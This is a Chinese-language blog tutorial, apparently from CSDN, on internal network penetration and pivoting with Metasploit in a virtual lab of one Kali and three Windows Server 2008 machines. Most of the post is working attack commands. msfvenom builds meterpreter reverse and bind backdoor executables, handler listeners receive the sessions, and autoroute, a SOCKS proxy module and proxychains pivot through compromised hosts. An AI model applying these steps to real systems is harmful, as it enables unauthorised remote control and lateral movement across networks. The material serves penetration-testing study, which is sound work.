内网渗透——Metasploit的代理转发

最新推荐文章于 2024-02-21 15:17:44 发布
最新推荐文章于 2024-02-21 15:17:44 发布
阅读量597 收藏 3
点赞数 6
文章标签: linux centos 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65544268/article/details/131641578
版权

目录

一、环境搭建

1.1 网络配置

1.2 开启文件共享功能

 二、MSF配置代理转发

        2.1 实现主机1上线

        2.2 实现主机2上线

        2.3 实现主机3上线 

一、环境搭建

1.1 网络配置

准备kali linux虚拟机*1

IP设置

 

vim /etc/network/interfaces

准备windows2008 R2虚拟机*3

主机1:

其他主机同理。

本次虚拟机环境没有防火墙限制,所以要提前关闭虚拟机的防火墙

1.2 开启文件共享功能

1)创建共享目录

mkdir /home/share

2) kali中开启文件共享需要下载samba

apt install samba

 3)修改samba配置文件

vi /etc/samba/smb.conf


文件末尾添加如下内容
[share]    #任意名字
comment = lv share   #任意名字
path = /home/share # 共享目录
;read only = no # 将共享目录设置为只读【前面加了;,表示这行被注释掉了】
writable = yes # 将共享目录设置为读写
browseable = yes # 显示共享目录下的所有文件
public = yes # 将共享目录设置为公共的
create mask = 0644 # 设置共享目录中的一般文件的默认权限
directory mask = 0755 # 设置共享目录中的目录文件的默认权限

4)启动samba

systemctl enable smb
systemctl enable nmb
systemctl restart smb
systemctl restart nmb

 5)查看是否启动成功【active(running)代表启动成功】

systemctl status smb
systemctl status nmb

注 :windows10/11 如果不是专业版企业版可能无法访问共享目录

注:win10/11有可能没有打开服务,导致无法访问共享

1)启动组策略

win+r运行输入以下内容

gpedit.msc

2)启用来宾登录

计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录

 二、MSF配置代理转发

        2.1 实现主机1上线

1)生成后门文件

reverse_tcp:反向链接时使用

lhost:kali 主机ip

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.108 lport=1111 -f exe >
/home/share/1111.exe

2)生成监听器

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1111
run

3)被攻击主机1运行生成的1111.exe文件

出现meterpreter就证明成功了,可以执行命令验证

ipconfig

 

 这样我们就实现了第一个主机上线的过程了。

        2.2 实现主机2上线

1)实现主机1上线

2)在已经上线的主机1上创建代理转发功能

        a).查看路由

run autoroute -p

显示 No routes have been added yet 说明没有路由

         b).添加路由

run post/multi/manage/autoroute

 出现这样的页面就说明添加路由成功了

3)挂起当前会话 

background

4)开启代理功能

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1122
run

5)测试代理功能是否可以工作

kali安装proxychains4

apt install proxychains4

修改配置文件

vim /etc/proxychains4.conf

修改之前设置好的端口1122

 6)在主机2上安装IIS

 7)使用proxychains4测试访问主机2上的IIS

proxychains4 nmap -Pn -sT -p80 10.10.10.2

STATE:open   说明可以访问IIS

 8)生成exe文件后门

bind_tcp:正向链接时使用

lhost: 0.0.0.0 指定主机2本机地址

msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=2222 -f exe >
/home/share/2222.exe

 9)生成监控器

background    #挂起会话
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.2
set lport 2222
run

10)主机2运行2222.exe

        2.3 实现主机3上线 

1)实现主机1、2上线

2)生成后门

msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=3333 -f exe >
/home/share/3333.exe

3)在主机2会话中创建路由

run post/multi/manage/autoroute

4)挂起会话

background

5)主机3正向链接

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 20.20.20.2
set lport 3333
run

 这样我们就实现了三台主机上线了。

LVzuiSuai
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
msf添加路由及socks代理进行内网穿透
最新发布
2301_76227305的博客
02-21 1114
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
msf添加路由及socks5代理
yy
05-07 7471
msf 添加路由 socks代理 nmap在挂上socks代理时进行扫描 -sT -Pn
Metasploit工具使用(下)
剁椒鱼头没剁椒的博客
01-30 1645
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。
MSF配置代理转发
j13373960206的博客
07-13 650
现在可以将主机1 设置代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf和主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail中的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6482
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
利用MSF设置代理
Continuejww的博客
11-10 843
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置
内网安全:代理技术详解
qq_61553520的博客
06-03 7762
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5421
meterpreter使用攻略(持续更新中)
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
渗透Metasploit Framework基础知识
12-28
Metasploit Framework基础知识
metasploit中使用lnk漏洞渗透测试.doc
03-18
metasploit中使用lnk漏洞渗透测试.doc
Metasploit渗透测试指南.修订版
09-12
完整扫描版带书签 Metasploit渗透测试指南.修订版Metasploit渗透测试指南.修订版
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
内网渗透测试 MSF搭建socks代理
m0_63028223的博客
10-14 2585
通过msf设置代理渗透内网不出网主机
MSF搭建socks代理
谢公子的博客
05-01 7601
目录 搭建代理 添加路由 ​搭建Socks4a代理 搭建Socks5代理 连接代理 搭建代理 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用socks4a和socks5进行代理。socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口...
我的内网渗透-metasploit基础
h1825819493的博客
06-12 804
Msfconsole是Metasploit框架的主要控制台界面。开源的渗透软件。
我的内网渗透-代理转发(1)
h1825819493的博客
06-24 294
必须经过用来进行路由转发的设备,网关的作用是让不同网段之间能够通信委托访问无论代理后面挂了几台设备,都认为是从代理进行访问,对外只表现为代理一台。外部认为是与代理进行交互网络虫洞隧道是一个网络的虚拟路径,使得入口的数据能够穿越到隧道的出口进行通信。
kali linux渗透实战metasploit
04-11
使用Kali Linux操作系统可以使用Metasploit工具进行渗透测试。 Metasploit是一款功能强大的框架,可用于漏洞分析和漏洞利用。它具有多种模块,包括扫描、漏洞利用和后渗透攻击。使用它可以对系统进行测试,寻找系统中的漏洞并建议必要的补丁程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值